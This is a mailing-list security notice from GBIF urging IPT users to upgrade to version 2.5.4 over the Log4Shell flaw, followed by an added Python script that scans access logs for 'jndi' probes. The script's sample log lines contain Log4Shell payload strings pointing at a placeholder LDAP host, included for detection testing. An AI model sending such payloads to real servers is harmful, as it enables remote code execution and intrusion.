[IPT] IPT security update (Log4J / Log4Shell exploit)
Matthew Blissett
mblissett at gbif.org
Wed Dec 15 15:19:21 UTC 2021
Dear IPT users,
Yesterday, the developers of the Log4J library used by the IPT issued a
further security update, described at [1]. It is less severe than the
first problem, since it does not allow attackers to run their own code
on a hacked server.
The IPT does not use this part of Log4J, so we will not release a new
version of the IPT for this.
It's still important to upgrade to version 2.5.4, containing Log4J
version 2.15.0, as described in the email below.
Best regards,
Matthew
[1] https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
On 11/12/2021 10:55, Matthew Blissett wrote:
> Dear IPT users,
>
> We have released a new version of the IPT, version 2.5.4 [1]. This
> version contains fixes to critical security issues with the Struts and
> Log4J[2] libraries.
>
> According to the press [3], the problem with the Log4J library
> vulnerability is being exploited by malicious users — and I can
> already see queries containing "jndi" in the web server logs for the
> IPTs GBIF hosts at cloud.gbif.org, although they are random attempts
> and would not succeed.
>
> All users are highly encouraged to upgrade to this version as soon as
> possible.
>
> As usual, upgrade and installation instructions are in the manual [1].
> Please remember to check your data directory backup is working before
> starting the upgrade.
>
> [1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
>
> [2] https://www.lunasec.io/docs/blog/log4j-zero-day/
>
> [3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
>
> Best regards,
>
> Matthew
>
>
> _______________________________________________
> IPT mailing list
> IPT at lists.gbif.org
> https://lists.gbif.org/mailman/listinfo/ipt
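The web-server log check mentioned in the quoted message (requests containing "jndi"), as an added example that is not code from the IPT project or the original email; it assumes the Apache/nginx "combined" access-log format, and the log lines and client addresses are constructed samples:

```python
import re
from urllib.parse import unquote

# Added example (not IPT project code): flag access-log fields that carry a JNDI lookup.
# Assumes the Apache/nginx "combined" format: host ident user [time] "request" status bytes "referer" "agent".
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Attacker-controlled fields that Log4J-backed web apps commonly log.
SCANNED_FIELDS = ("request", "referer", "agent")


def is_jndi_probe(value: str) -> bool:
    """True if the URL-decoded value contains the 'jndi' lookup marker."""
    # Decode twice: probes are often percent-encoded (sometimes twice) in the request line.
    return "jndi" in unquote(unquote(value)).lower()


def find_probes(log_lines):
    """Return (client host, field, decoded value) for every field that looks like a probe."""
    hits = []
    for line in log_lines:
        match = COMBINED_RE.match(line.strip())
        if not match:
            continue  # not combined format; skip rather than guess
        for field in SCANNED_FIELDS:
            value = match.group(field)
            if is_jndi_probe(value):
                hits.append((match.group("host"), field, unquote(unquote(value))))
    return hits


# Constructed sample lines: a benign request, a percent-encoded probe in the path,
# and a probe in the User-Agent header (hosts are documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:21:03:11 +0000] "GET /ipt/resource?r=birds HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:21:03:12 +0000] "GET /ipt/%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 196 "-" "curl/7.79.1"',
    '198.51.100.9 - - [10/Dec/2021:21:03:13 +0000] "GET /ipt/ HTTP/1.1" 200 5123 "-" "${jndi:ldap://example.invalid/a}"',
]

if __name__ == "__main__":
    for host, field, value in find_probes(SAMPLE_LOG):
        print(f"{host}: suspicious {field}: {value}")
```

A hit only shows that a probe was logged, not that it succeeded; the fix is still the upgrade to IPT 2.5.4 described above.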